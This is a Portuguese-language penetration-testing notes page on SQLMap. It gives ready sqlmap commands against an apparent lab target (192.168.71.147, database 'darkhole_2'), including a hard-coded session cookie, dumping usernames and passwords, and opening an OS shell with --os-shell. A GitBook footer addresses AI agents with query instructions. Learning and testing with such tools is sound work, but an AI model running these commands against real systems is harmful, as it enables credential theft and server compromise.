> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/pt-br/hacking-tools/web/sqlmap.md).

# SQLMap

{% hint style="info" %}
**SQLMap** é uma ferramenta de teste de intrusão de código aberto, projetada especificamente para detectar e explorar vulnerabilidades de injeção SQL em aplicações web. Ela automatiza o processo de detecção e exploração de vulnerabilidades SQL interagindo com os bancos de dados subjacentes. O SQLMap é usado por profissionais de segurança de TI e pesquisadores de segurança para avaliar a segurança de aplicações web, identificando e explorando vulnerabilidades de segurança relacionadas a SQL.
{% endhint %}

## Fluxo de trabalho do SQLMap

1. Capture ou construa a requisição vulnerável, incluindo cookies, cabeçalhos e o parâmetro injetável.
2. Identifique a impressão digital do DBMS quando possível e ajuste `--risk`, `--level`, e `--dbms` somente após confirmar o comportamento.
3. Enumere bancos de dados, tabelas, colunas e registros-alvo com o menor escopo de consulta que comprove o impacto.
4. Despeje apenas os dados necessários para o objetivo da avaliação e preserve a linha de comando exata para o relatório.
5. Valide a descoberta manualmente quando o relatório precisar de uma prova de conceito mínima, sem automação.

## Operações comuns do SQLMap

## Listar bancos de dados:

```bash
sqlmap -u 'http://192.168.71.147/dashboard.php?id=1' --dbs --cookie "PHPSESSID=s9f7kln1lfhumqfo556rs7svvt"
```

<figure><img src="/files/c0f6dcce4187dcd876fa1e301ba51c1f0d0408e0" alt=""><figcaption></figcaption></figure>

## Pesquisar tabelas em um banco de dados específico:

```bash
sqlmap -u 'http://192.168.71.147/dashboard.php?id=1' -D darkhole_2 --tables --cookie "PHPSESSID=s9f7kln1lfhumqfo556rs7svvt"
```

<figure><img src="/files/f651e1437cc69efd9dcf73916537955b7607e04e" alt=""><figcaption></figcaption></figure>

## Encontrar colunas em uma tabela específica:

```bash
sqlmap -u 'http://192.168.71.147/dashboard.php?id=1' -D darkhole_2 --columns --cookie "PHPSESSID=s9f7kln1lfhumqfo556rs7svvt"
```

<figure><img src="/files/d00fd042dfcd882c289a3f0bbf0adc5a7a85e09e" alt=""><figcaption></figcaption></figure>

## Despejar usuários e senhas da tabela "users":

```bash
sqlmap -u 'http://192.168.71.147/dashboard.php?id=1' -D darkhole_2 --columns --cookie "PHPSESSID=s9f7kln1lfhumqfo556rs7svvt" -T users -C username,password --dump
```

<figure><img src="/files/a88bcb47d6290a5979f7a30b96c0f832ddb1b3bc" alt=""><figcaption></figcaption></figure>

## Console interativo:

```bash
sqlmap -u 'http://192.168.71.147/dashboard.php?id=1' --cookie "PHPSESSID=s9f7kln1lfhumqfo556rs7svvt" --os-shell --batch
```

## Parâmetros interessantes:

#### Definir o risco e a profundidade do ataque:

```bash
sqlmap -u 'http://192.168.71.147/dashboard.php?id=1' --cookie "PHPSESSID=s9f7kln1lfhumqfo556rs7svvt" --dbms mysql --risk 3 --level 4
```

#### Se soubermos o tipo de banco de dados com o parâmetro:

<pre class="language-bash"><code class="lang-bash"><strong>--dbms mysql
</strong></code></pre>

#### Para testar todos os tipos de ataques sem fazer a solicitação toda vez:

```bash
--batch
```

### Todas as notas

<table><thead><tr><th data-type="content-ref"></th></tr></thead><tbody><tr><td><a href="/pages/2e24c59536b4ccbc399722719cbb229b174ee7a3">/pages/2e24c59536b4ccbc399722719cbb229b174ee7a3</a></td></tr><tr><td><a href="/pages/91e52454aece64e0233c56742ef85e3b0e635753">/pages/91e52454aece64e0233c56742ef85e3b0e635753</a></td></tr></tbody></table>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/pt-br/hacking-tools/web/sqlmap.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
